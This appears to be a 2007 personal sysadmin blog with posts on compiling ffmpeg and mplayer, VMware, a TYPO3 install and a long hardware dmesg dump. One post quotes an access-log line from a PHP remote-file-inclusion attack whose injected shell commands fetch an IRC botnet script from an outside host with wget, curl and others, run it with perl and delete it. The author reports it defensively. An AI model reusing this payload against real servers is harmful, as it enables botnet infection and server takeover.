download the video with unplug (right click and choose the unplug from menu)
in my case i have this video
extract the mp3 from the flv (audio is MP3-encoded in the movie file)
ffmpeg -i doors_when_the_music_is_over.flv -vn -acodec copy doors_when_the_music_is_over.mp3


The audio codec "copy" tells ffmpeg to use the same codec for encoding as was
used for decoding. Also, since we're not overriding any of the other audio
parameters such as sample rate or bit rate, we should be retrieving the sound
track exactly as it was multiplexed into the movie file.

you can read more about working with ffmpeg

Monday, August 13, 2007

Ubuntu Weekly Newsletter #52

Ubuntu Community Marketing Team is proud to release the 52nd issue of its Community Weekly Newsletter. In this issue we cover the release of Tribe 4, promoting Ubuntu through the use of viral videos, progress of the US Loco Teams Project, security breaches in community hosted servers, and much much more.

read more | digg story

Friday, August 10, 2007

Lord


Lord
Originally uploaded by pescatello
drinks beer , and he likes it

Qloud Facebook App is Live


Qloud Facebook App is Live
Originally uploaded by pescatello
Qloud Facebook App is Live

You can check it out here: www.facebook.com/apps/application.php?id=2376424094

i use it mainly for playing youtube related tags (let's say doors)

Thursday, August 09, 2007

how to fix office@example.com locked inbox (pop3)

got one large email - 300M from ioana
mv office office.old
csplit office.old /From ioana/
cat xx00 > office

Tuesday, August 07, 2007

i have added flamerobin to boxlinks
i like the site a lot (ovi's site )
http://www.boxlinks.ro/link/FLAMEROBIN-1492.html

Friday, July 13, 2007

We use vmware to escape spyware , to run ubuntu and then kubuntu
in parallel machines and without adware
When memory is small is time for xubuntu , also sometime
we try gobuntu.
Is like running an os in an bottle , viruses can't escape if you try windows vm
is good to reduce the number of servers needed for testing, and trying new stuff (ubuntu gutsy gibbon) or weird operating systems reactos , vista
or antique stuff : redhat, or centos
with vmware server we run many operating systems in parallel , each os distributed for one cpu
is good also for migrations from windows to linux and running both
just one good step to world domination and and fixing the bug #1 https://launchpad.net/ubuntu/+bug/1
http://mshiltonj.com/software_wars/current/
http://homepage.sunrise.ch/mysunrise/ekeller00/EricKellerUbuntuPage.html
http://www.oszoo.org/wiki/index.php/Main_Page
http://www.oszoo.org/wiki/index.php/Category:OS_images

Thursday, July 12, 2007

installing typo3 - 4.0.x with ftp
In order to set up a new site, you will need to combine both, the source AND the dummy package by extracting them to the same folder.)

download the dummy with source zip
unzip typo3_src+dummy-4.1.5.zip

Run these commands as root in the dummy directory:

# chmod -R g+w,o-rwx fileadmin typo3conf typo3temp uploads


upload files with ftp (ftp in my case)

7 In your browser, visit
http://[your.site.name]/cms/

8 Follow the instructions in the 1-2-3 install tool

9 From this point, you can access the backend through
http://[your.site.name]/cms/typo3/
with the username "admin" and password "password".




typo3.org: Packages

technorati tags:, , , ,

Blogged with Flock

3gp, 2gp , mp4 conversion issues with ffmpeg

ffmpeg accepts only encoding 3gp , 2gp , mp4 files (E- means encoding D-deconding)
ffmpeg -formats | grep 3gp

E 3g2 3gp2 format
E 3gp 3gp format
DE amr 3gpp amr file format
D mov,mp4,m4a,3gp,3g2,mj2 QuickTime/MPEG4/Motion JPEG 2000 format
ffmpeg -formats | grep mp4

E mp4 mp4 format
E psp psp mp4 format


so it is needed that mencoder to be used to decode the
3gp,2gp,mp4 files



mencoder example.3g2 -nosound -ovc lavc -lavcopts
vcodec=mpeg4 -o example.avi
mplayer -vo null -ao pcm -af
resample=8000,volume=+4db:sc example.3g2
ffmpeg -i example.avi -i audiodump.wav example.flv

Wednesday, July 11, 2007

grep cmd access.log
Today i was inspecting the logs

189.23.39.114 - - [11/Jul/2007:03:20:43 -0400] "GET /fooo.php?fooo=http://www.freewebs.com/cuza0/tool25.dat?&cmd=cd%20/tmp;rm%20-rf%20botnet*;wget%20http://www.freewebs.com/nkparceria/botnet.txt;lwp-download%20http://www.freewebs.com/nkparceria/botnet.txt;fetch%20http://www.freewebs.com/nkparceria/botnet.txt;curl%20-o%20botnet.txt%20http://www.freewebs.com/nkparceria/botnet.txt;GET%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;lynx%20-source%20http://www.freewebs.com/nkparceria/botnet.txt%20>botnet.txt;perl%20botnet.txt;rm%20-rf%20botnet.txt* HTTP/1.1" 200 4812 "-" "Mozilla/3.0 (compatible; Indy Library)"

you can see the php code here
http://www.freewebs.com/cuza0/tool25.dat
and irc perl bot is here
http://www.freewebs.com/nkparceria/botnet.txt

Now i inform the freewebs about this hosting of the evil scripts
mplayer/ffmpeg conversion issues (compressed swf and h264)
In this part i solved some issues with decoding/encoding


1.added support for h264
http://www.videolan.org/developers/x264.html
# svn co svn://svn.videolan.org/x264/trunk x264
cd x264
./configure --prefix=/usr
make ; make install
2 wget http://ftp.debian.org/debian/pool/main/f/faad2/faad2_2.5.orig.tar.g
tar -zxvf faad2_2.5.orig.tar.gz
cd faad2-2.5/
./configure --prefix=/usr; make ; make install
3.added support in configure script for x264 and theora(ffmpeg)
apt-get install libtheora

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-libx264 --enable-libtheora --enable-libfaad --enable-gpl --enable-shared --enable-pthreads --enable-swscaler
4. found the issue with the compiled swf
http://lists.mplayerhq.hu/pipermail/ffmpeg-user/2006-December/005587.html
5.recompiled mplayer/mencoder from svn
svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer
cd mplayer
./configure --prefix=/usr
make; make install

Tuesday, July 10, 2007

we secured one server for an annonymous client

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion
[The box i found this tool was an old rh8.0 box with default php and httpd and allow_url_fopen on !!, solution was to compile all the newest and the greatest stable versions that works for that site
httpd-2.2.4 (latest recomeded)
mod_perl-2.0.3
php-4.4.7
tomcat-connectors-1.2.23 (mod_jk)

I  work now to upgrade  openssh to newest version http://openssh.org/
ssh should only permit access with ssh_key and not with the plain text like is configured now and access should be restrincted to a few users 
I will  continue after that with aide installation and log monitoring.
 then will install mod_security after all  http://www.securityfocus.com/infocus/1706
]

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

technorati tags:, , , , , , , , ,

Blogged with Flock

Wednesday, July 04, 2007

compiling ffmpeg (and mplayer) with amr7 support
http://www.penguin.cz/~utx/amr
apt-get install libgsm1-dev toolame libgsm1-dev libvorbis-dev libogg-dev
apt-get install libfaad2-dev
apt-get install subversion
apt-get install libgsm1-dev libgsmme-dev
apt-get install unzip
apt-get install liba52-0.7.4-dev
apt-get install patch

wget http://downloads.xvid.org/downloads/xvidcore-1.1.2.tar.bz2
tar -jxf xvidcore-1.1.2.tar.bz2
wget http://mesh.dl.sourceforge.net/sourceforge/lame/lame-3.97.tar.gz
tar -zxvf lame-3.97.tar.gz
cd lame-3.97
./configure --prefix=/usr;make;make install
cd ..
cd xvidcore-1.1.2/build/generic/
./configure --prefix=/usr;make;make install
cd ../../../

svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
cd ffmpeg/libavcodec/
mkdir amrwb_float
cd amrwb_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.204/26204-510.zip
unzip 26204-510.zip
unzip 26204-510_ANSI-C_source_code.zip
cd ..
mkdir amr_float
cd amr_float
wget http://www.3gpp.org/ftp/Specs/archive/26_series/26.104/26104-510.zip
unzip 26104-510.zip
unzip 26104-510_ANSI_C_source_code.zip
cd ../../
wget http://ftp.penguin.cz/pub/users/utx/amr/amrwb-7.0.0.1.tar.bz2
tar -jxvf amrwb-7.0.0.1.tar.bz2
cd amrwb-7.0.0.1
./configure --prefix=/usr ; make ; make install
wget http://ftp.penguin.cz/pub/users/utx/amr/amrnb-6.1.0.4.tar.bz2
tar -jxvf amrnb-6.1.0.4.tar.bz2
cd amrnb-6.1.0.4
./configure --prefix=/usr ; make ; make install

./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-gpl;
make ; make install
cd ..
wget http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-1.0rc1.tar.bz2
wget http://www2.mplayerhq.hu/MPlayer/releases/codecs/essential-20061022.tar.bz2
tar -jxvf essential-20061022.tar.bz2
mkdir /usr/lib/codecs/
cd essential-20061022
mv * /usr/lib/codecs/
cd ..
cd MPlayer-1.0rc1/
./configure --prefix=/opt/mplayer
make; make install

Friday, June 29, 2007

we have one google box (search appliance) , here are the specs for an 2004 machine
8G of ddr200 ecc ram , 2x2 dual xeon server(with hyperthreading , no 64bit) , intel motherboard
5x250G IDE hardrives with 3ware raid , dual gigabit nics ,

here is dmesg output

[ 0.000000] Linux version 2.6.20-16-server (root@terranova) (gcc version 4.1.2 (Ubuntu 4.1.2-0ubuntu4)) #2 SMP Thu Jun 7 20:26:23 UTC 2007 (Ubuntu 2.6.20-16.29-server)
[ 0.000000] BIOS-provided physical RAM map:
[ 0.000000] sanitize start
[ 0.000000] sanitize end
[ 0.000000] copy_e820_map() start: 0000000000000000 size: 000000000009fc00 end: 000000000009fc00 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] copy_e820_map() start: 000000000009fc00 size: 0000000000000400 end: 00000000000a0000 type: 2
[ 0.000000] copy_e820_map() start: 00000000000f0000 size: 0000000000010000 end: 0000000000100000 type: 2
[ 0.000000] copy_e820_map() start: 0000000000100000 size: 00000000f7ef0000 end: 00000000f7ff0000 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] copy_e820_map() start: 00000000f7ff0000 size: 0000000000008000 end: 00000000f7ff8000 type: 3
[ 0.000000] copy_e820_map() start: 00000000f7ff8000 size: 0000000000008000 end: 00000000f8000000 type: 4
[ 0.000000] copy_e820_map() start: 00000000fec00000 size: 0000000000100000 end: 00000000fed00000 type: 2
[ 0.000000] copy_e820_map() start: 00000000fee00000 size: 0000000000001000 end: 00000000fee01000 type: 2
[ 0.000000] copy_e820_map() start: 00000000ffb00000 size: 0000000000100000 end: 00000000ffc00000 type: 2
[ 0.000000] copy_e820_map() start: 00000000fff80000 size: 0000000000080000 end: 0000000100000000 type: 2
[ 0.000000] copy_e820_map() start: 0000000100000000 size: 0000000108000000 end: 0000000208000000 type: 1
[ 0.000000] copy_e820_map() type is E820_RAM
[ 0.000000] BIOS-e820: 0000000000000000 - 000000000009fc00 (usable)
[ 0.000000] BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved)
[ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved)
[ 0.000000] BIOS-e820: 0000000000100000 - 00000000f7ff0000 (usable)
[ 0.000000] BIOS-e820: 00000000f7ff0000 - 00000000f7ff8000 (ACPI data)
[ 0.000000] BIOS-e820: 00000000f7ff8000 - 00000000f8000000 (ACPI NVS)
[ 0.000000] BIOS-e820: 00000000fec00000 - 00000000fed00000 (reserved)
[ 0.000000] BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved)
[ 0.000000] BIOS-e820: 00000000ffb00000 - 00000000ffc00000 (reserved)
[ 0.000000] BIOS-e820: 00000000fff80000 - 0000000100000000 (reserved)
[ 0.000000] BIOS-e820: 0000000100000000 - 0000000208000000 (usable)
[ 0.000000] 7424MB HIGHMEM available.
[ 0.000000] 896MB LOWMEM available.
[ 0.000000] found SMP MP-table at 000fbe40
[ 0.000000] Entering add_active_range(0, 0, 2129920) 0 entries of 256 used
[ 0.000000] Zone PFN ranges:
[ 0.000000] DMA 0 -> 4096
[ 0.000000] Normal 4096 -> 229376
[ 0.000000] HighMem 229376 -> 2129920
[ 0.000000] early_node_map[1] active PFN ranges
[ 0.000000] 0: 0 -> 2129920
[ 0.000000] On node 0 totalpages: 2129920
[ 0.000000] DMA zone: 32 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 4064 pages, LIFO batch:0
[ 0.000000] Normal zone: 1760 pages used for memmap
[ 0.000000] Normal zone: 223520 pages, LIFO batch:31
[ 0.000000] HighMem zone: 14848 pages used for memmap
[ 0.000000] HighMem zone: 1885696 pages, LIFO batch:31
[ 0.000000] DMI 2.3 present.
[ 0.000000] ACPI: RSDP (v000 AMI ) @ 0x000faba0
[ 0.000000] ACPI: RSDT (v001 AMIINT AMIINI09 0x00000010 MSFT 0x0100000d) @ 0xf7ff0000
[ 0.000000] ACPI: FADT (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff0030
[ 0.000000] ACPI: MADT (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff00c0
[ 0.000000] ACPI: SPCR (v001 AMIINT AMIINI09 0x00000011 MSFT 0x0100000d) @ 0xf7ff0170
[ 0.000000] ACPI: DSDT (v001 INTEL PLUMAS 0x00001000 MSFT 0x0100000d) @ 0x00000000
[ 0.000000] ACPI: PM-Timer IO Port: 0x408
[ 0.000000] ACPI: Local APIC address 0xfee00000
[ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled)
[ 0.000000] Processor #0 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
[ 0.000000] Processor #1 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x02] enabled)
[ 0.000000] Processor #2 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x03] enabled)
[ 0.000000] Processor #3 15:2 APIC version 20
[ 0.000000] ACPI: LAPIC_NMI (acpi_id[0xff] high edge lint[0x1])
[ 0.000000] ACPI: IOAPIC (id[0x07] address[0xfec00000] gsi_base[0])
[ 0.000000] IOAPIC[0]: apic_id 7, version 32, address 0xfec00000, GSI 0-23
[ 0.000000] ACPI: IOAPIC (id[0x08] address[0xfec82000] gsi_base[24])
[ 0.000000] IOAPIC[1]: apic_id 8, version 32, address 0xfec82000, GSI 24-47
[ 0.000000] ACPI: IOAPIC (id[0x09] address[0xfec82400] gsi_base[48])
[ 0.000000] IOAPIC[2]: apic_id 9, version 32, address 0xfec82400, GSI 48-71
[ 0.000000] ACPI: IOAPIC (id[0x0a] address[0xfec81000] gsi_base[72])
[ 0.000000] IOAPIC[3]: apic_id 10, version 255, address 0xfec81000, GSI 72-327
[ 0.000000] ACPI: IOAPIC (id[0x0b] address[0xfec81400] gsi_base[96])
[ 0.000000] IOAPIC[4]: apic_id 11, version 255, address 0xfec81400, GSI 96-351
[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
[ 0.000000] ACPI: IRQ0 used by override.
[ 0.000000] ACPI: IRQ2 used by override.
[ 0.000000] ACPI: IRQ9 used by override.
[ 0.000000] Enabling APIC mode: Flat. Using 5 I/O APICs
[ 0.000000] Using ACPI (MADT) for SMP configuration information
[ 0.000000] Allocating PCI resources starting at f8800000 (gap: f8000000:06c00000)
[ 0.000000] Detected 2595.719 MHz processor.
[ 45.626943] Built 1 zonelists. Total pages: 2113280
[ 45.626948] Kernel command line: root=UUID=1adc228a-2114-4ac8-bbfb-a89e44601ba4 ro quiet splash
[ 45.627120] mapped APIC to ffffd000 (fee00000)
[ 45.627123] mapped IOAPIC to ffffc000 (fec00000)
[ 45.627126] mapped IOAPIC to ffffb000 (fec82000)
[ 45.627128] mapped IOAPIC to ffffa000 (fec82400)
[ 45.627131] mapped IOAPIC to ffff9000 (fec81000)
[ 45.627133] mapped IOAPIC to ffff8000 (fec81400)
[ 45.627137] Enabling fast FPU save and restore... done.
[ 45.627140] Enabling unmasked SIMD FPU exception support... done.
[ 45.627152] Initializing CPU#0
[ 45.627234] PID hash table entries: 4096 (order: 12, 16384 bytes)
[ 45.629294] Console: colour VGA+ 80x25
[ 45.629839] Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
[ 45.630440] Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
[ 46.143553] Memory: 8308804k/8519680k available (2020k kernel code, 78580k reserved, 897k data, 332k init, 7471040k highmem)
[ 46.143566] virtual kernel memory layout:
[ 46.143568] fixmap : 0xfff4f000 - 0xfffff000 ( 704 kB)
[ 46.143569] pkmap : 0xffc00000 - 0xffe00000 (2048 kB)
[ 46.143570] vmalloc : 0xf8800000 - 0xffbfe000 ( 115 MB)
[ 46.143571] lowmem : 0xc0000000 - 0xf8000000 ( 896 MB)
[ 46.143572] .init : 0xc03df000 - 0xc0432000 ( 332 kB)
[ 46.143573] .data : 0xc02f9234 - 0xc03d9754 ( 897 kB)
[ 46.143575] .text : 0xc0100000 - 0xc02f9234 (2020 kB)
[ 46.143578] Checking if this processor honours the WP bit even in supervisor mode... Ok.
[ 46.286383] Calibrating delay using timer specific routine.. 5194.60 BogoMIPS (lpj=25973008)
[ 46.286438] Security Framework v1.0.0 initialized
[ 46.286450] SELinux: Disabled at boot.
[ 46.286469] Mount-cache hash table entries: 512
[ 46.286666] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.286680] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.286684] CPU: L2 cache: 512K
[ 46.286687] CPU: Physical Processor ID: 0
[ 46.286689] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.286705] Compat vDSO mapped to ffffe000.
[ 46.286710] Remapping vsyscall page to ffffe000
[ 46.286726] Checking 'hlt' instruction... OK.
[ 46.326473] SMP alternatives: switching to UP code
[ 46.326981] Early unpacking initramfs... done
[ 46.641650] ACPI: Core revision 20060707
[ 46.642803] ACPI: Looking for DSDT in initramfs... file /DSDT.aml not found, using machine DSDT.
[ 46.644271] CPU0: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.644297] SMP alternatives: switching to SMP code
[ 46.644504] Booting processor 1/1 eip 3000
[ 46.654969] Initializing CPU#1
[ 46.805705] Calibrating delay using timer specific routine.. 5191.34 BogoMIPS (lpj=25956715)
[ 46.805715] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.805725] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.805727] CPU: L2 cache: 512K
[ 46.805730] CPU: Physical Processor ID: 3
[ 46.805732] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.806008] CPU1: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.806028] SMP alternatives: switching to SMP code
[ 46.806087] Booting processor 2/2 eip 3000
[ 46.816474] Initializing CPU#2
[ 46.965497] Calibrating delay using timer specific routine.. 5191.35 BogoMIPS (lpj=25956780)
[ 46.965508] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 46.965520] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 46.965523] CPU: L2 cache: 512K
[ 46.965525] CPU: Physical Processor ID: 3
[ 46.965528] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 46.965713] CPU2: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 46.965734] SMP alternatives: switching to SMP code
[ 46.965781] Booting processor 3/3 eip 3000
[ 46.976267] Initializing CPU#3
[ 47.125289] Calibrating delay using timer specific routine.. 5191.29 BogoMIPS (lpj=25956491)
[ 47.125300] CPU: After generic identify, caps: bfebfbff 00000000 00000000 00000000 00004400 00000000 00000000
[ 47.125312] CPU: Trace cache: 12K uops, L1 D cache: 8K
[ 47.125315] CPU: L2 cache: 512K
[ 47.125318] CPU: Physical Processor ID: 0
[ 47.125320] CPU: After all inits, caps: bfebfbff 00000000 00000000 00003080 00004400 00000000 00000000
[ 47.125531] CPU3: Intel(R) Xeon(TM) CPU 2.60GHz stepping 09
[ 47.125579] Total of 4 processors activated (20768.59 BogoMIPS).
[ 47.128580] ENABLING IO-APIC IRQs
[ 47.128832] ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1
[ 47.345012] checking TSC synchronization across 4 CPUs: passed.
[ 0.029957] Brought up 4 CPUs
[ 0.091313] migration_cost=26,745
[ 0.091724] Booting paravirtualized kernel on bare hardware
[ 0.091832] Time: 12:37:21 Date: 05/28/107
[ 0.091880] NET: Registered protocol family 16
[ 0.092006] EISA bus registered
[ 0.092012] ACPI: bus type pci registered
[ 0.093994] PCI: PCI BIOS revision 2.10 entry at 0xfdb71, last bus=4
[ 0.093997] PCI: Using configuration type 1
[ 0.093998] Setting up standard PCI resources
[ 0.097709] mtrr: your CPUs had inconsistent variable MTRR settings
[ 0.097712] mtrr: probably your BIOS does not setup all CPUs.
[ 0.097714] mtrr: corrected configuration.
[ 0.102862] ACPI: Interpreter enabled
[ 0.102866] ACPI: Using IOAPIC for interrupt routing
[ 0.103417] ACPI: PCI Root Bridge [PCI0] (0000:00)
[ 0.103426] PCI: Probing PCI hardware (bus 00)
[ 0.104100] PCI quirk: region 0400-047f claimed by ICH4 ACPI/GPIO/TCO
[ 0.104105] PCI quirk: region 0500-053f claimed by ICH4 GPIO
[ 0.105118] Boot video device is 0000:01:09.0
[ 0.105152] PCI: Transparent bridge - 0000:00:1e.0
[ 0.105182] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT]
[ 0.114071] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P1._PRT]
[ 0.114416] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.P2P3._PRT]
[ 0.114574] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.P2P4._PRT]
[ 0.116958] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *10 11 12 14 15)
[ 0.117189] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.117429] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 *10 11 12 14 15)
[ 0.117654] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 10 *11 12 14 15)
[ 0.117894] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118118] ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118345] ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 11 12 14 15) *0, disabled.
[ 0.118572] ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 *5 6 7 10 11 12 14 15)
[ 0.118781] Linux Plug and Play Support v0.97 (c) Adam Belay
[ 0.118796] pnp: PnP ACPI init
[ 0.121606] pnp: PnP ACPI: found 11 devices
[ 0.121613] PnPBIOS: Disabled by ACPI PNP
[ 0.121697] PCI: Using ACPI for IRQ routing
[ 0.121701] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report
[ 0.130109] NET: Registered protocol family 8
[ 0.130111] NET: Registered protocol family 20
[ 0.130123] NetLabel: Initializing
[ 0.130125] NetLabel: domain hash size = 128
[ 0.130127] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.130148] NetLabel: unlabeled traffic allowed by default
[ 0.130845] PCI: Bridge: 0000:02:1d.0
[ 0.130850] IO window: b000-bfff
[ 0.130856] MEM window: fe900000-fe9fffff
[ 0.130861] PREFETCH window: fb400000-fb4fffff
[ 0.130867] PCI: Bridge: 0000:02:1f.0
[ 0.130871] IO window: a000-afff
[ 0.130876] MEM window: fd800000-fe8fffff
[ 0.130881] PREFETCH window: fb300000-fb3fffff
[ 0.130887] PCI: Bridge: 0000:00:04.0
[ 0.130890] IO window: a000-bfff
[ 0.130895] MEM window: fd800000-feafffff
[ 0.130899] PREFETCH window: fb300000-fb5fffff
[ 0.130905] PCI: Bridge: 0000:00:1e.0
[ 0.130908] IO window: 9000-9fff
[ 0.130915] MEM window: fb700000-fd7fffff
[ 0.130920] PREFETCH window: fb200000-fb2fffff
[ 0.130957] PCI: Setting latency timer of device 0000:00:1e.0 to 64
[ 0.131014] NET: Registered protocol family 2
[ 0.259740] IP route cache hash table entries: 32768 (order: 5, 131072 bytes)
[ 0.259958] TCP established hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.261114] TCP bind hash table entries: 65536 (order: 7, 524288 bytes)
[ 0.261870] TCP: Hash tables configured (established 131072 bind 65536)
[ 0.261876] TCP reno registered
[ 0.289802] checking if image is initramfs... it is
[ 0.911108] Freeing initrd memory: 7346k freed
[ 0.911805] audit: initializing netlink socket (disabled)
[ 0.911824] audit(1183034242.480:1): initialized
[ 0.911929] highmem bounce pool size: 64 pages
[ 0.912115] VFS: Disk quotas dquot_6.5.1
[ 0.912144] Dquot-cache hash table entries: 1024 (order 0, 4096 bytes)
[ 0.912219] io scheduler noop registered
[ 0.912223] io scheduler anticipatory registered
[ 0.912226] io scheduler deadline registered (default)
[ 0.912243] io scheduler cfq registered
[ 0.912629] isapnp: Scanning for PnP cards...
[ 1.269346] isapnp: No Plug & Play device found
[ 1.302819] Real Time Clock Driver v1.12ac
[ 1.302884] Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled
[ 1.303019] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
[ 1.303239] serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
[ 1.304028] 00:07: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
[ 1.304411] 00:08: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
[ 1.304723] mice: PS/2 mouse device common for all mice
[ 1.305567] RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
[ 1.305770] input: Macintosh mouse button emulation as /class/input/input0
[ 1.305824] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
[ 1.305830] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx
[ 1.306122] PNP: PS/2 Controller [PNP0f03:PS2M] at 0x60,0x64 irq 12
[ 1.306126] PNP: PS/2 controller doesn't have KBD irq; using default 1
[ 1.309005] serio: i8042 KBD port at 0x60,0x64 irq 1
[ 1.309013] serio: i8042 AUX port at 0x60,0x64 irq 12
[ 1.309178] EISA: Probing bus 0 at eisa.0
[ 1.309229] EISA: Detected 0 cards.
[ 1.339451] TCP cubic registered
[ 1.339465] NET: Registered protocol family 1
[ 1.339506] Starting balanced_irq
[ 1.339518] Using IPI No-Shortcut mode
[ 1.339677] ACPI: (supports S0 S1 S4 S5)
[ 1.339728] Magic number: 11:955:633
[ 1.339847] hash matches device ptycc
[ 1.340279] Freeing unused kernel memory: 332k freed
[ 1.348236] Time: tsc clocksource has been installed.
[ 1.542559] Capability LSM initialized
[ 1.561178] device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com
[ 1.680290] raid5: automatically using best checksumming function: pIII_sse
[ 1.727733] pIII_sse : 3273.200 MB/sec
[ 1.727736] raid5: using function: pIII_sse (3273.200 MB/sec)
[ 1.897552] raid6: int32x1 748 MB/s
[ 2.067312] raid6: int32x2 721 MB/s
[ 2.237215] raid6: int32x4 675 MB/s
[ 2.406958] raid6: int32x8 260 MB/s
[ 2.576648] raid6: mmxx1 1430 MB/s
[ 2.746417] raid6: mmxx2 1886 MB/s
[ 2.916220] raid6: sse1x1 912 MB/s
[ 3.086013] raid6: sse1x2 1282 MB/s
[ 3.255760] raid6: sse2x1 1717 MB/s
[ 3.425540] raid6: sse2x2 2239 MB/s
[ 3.425544] raid6: using algorithm sse2x2 (2239 MB/s)
[ 3.425551] md: raid6 personality registered for level 6
[ 3.425555] md: raid5 personality registered for level 5
[ 3.425558] md: raid4 personality registered for level 4
[ 3.426077] SCSI subsystem initialized
[ 3.434145] libata version 2.20 loaded.
[ 3.440379] ata_piix 0000:00:1f.1: version 2.10ac1
[ 3.440410] ACPI: PCI Interrupt 0000:00:1f.1[A] -> GSI 18 (level, low) -> IRQ 16
[ 3.440452] PCI: Setting latency timer of device 0000:00:1f.1 to 64
[ 3.440545] ata1: PATA max UDMA/100 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x0001ff00 irq 14
[ 3.440597] ata2: PATA max UDMA/100 cmd 0x00010170 ctl 0x00010376 bmdma 0x0001ff08 irq 15
[ 3.440631] scsi0 : ata_piix
[ 3.503197] usbcore: registered new interface driver usbfs
[ 3.503242] usbcore: registered new interface driver hub
[ 3.508226] usbcore: registered new device driver usb
[ 3.509901] USB Universal Host Controller Interface driver v3.0
[ 3.515734] 3ware Storage Controller device driver for Linux v1.26.02.002.
[ 3.532362] Intel(R) PRO/1000 Network Driver - version 7.3.15-k2-NAPI
[ 3.532369] Copyright (c) 1999-2006 Intel Corporation.
[ 3.605181] scsi1 : ata_piix
[ 3.954876] ata2.01: ATAPI, max UDMA/33
[ 4.144609] ata2.01: configured for UDMA/33
[ 4.153879] scsi 1:0:1:0: CD-ROM HL-DT-ST DVD-ROM GDR8164B 0L06 PQ: 0 ANSI: 5
[ 4.154537] ACPI: PCI Interrupt 0000:03:01.0[A] -> GSI 24 (level, low) -> IRQ 17
[ 4.154611] scsi_proc_hostdir_add: proc_mkdir failed for
[ 6.201591] scsi2 : 3ware Storage Controller
[ 6.201666] 3w-xxxx: scsi2: Found a 3ware Storage Controller at 0xac00, IRQ: 17.
[ 6.202101] ACPI: PCI Interrupt 0000:04:02.0[A] -> GSI 48 (level, low) -> IRQ 18
[ 6.202234] ACPI: PCI Interrupt 0000:00:1d.0[A] -> <5>scsi 2:0:0:0: Direct-Access 3ware Logical Disk 0 1.2 PQ: 0 ANSI: 0
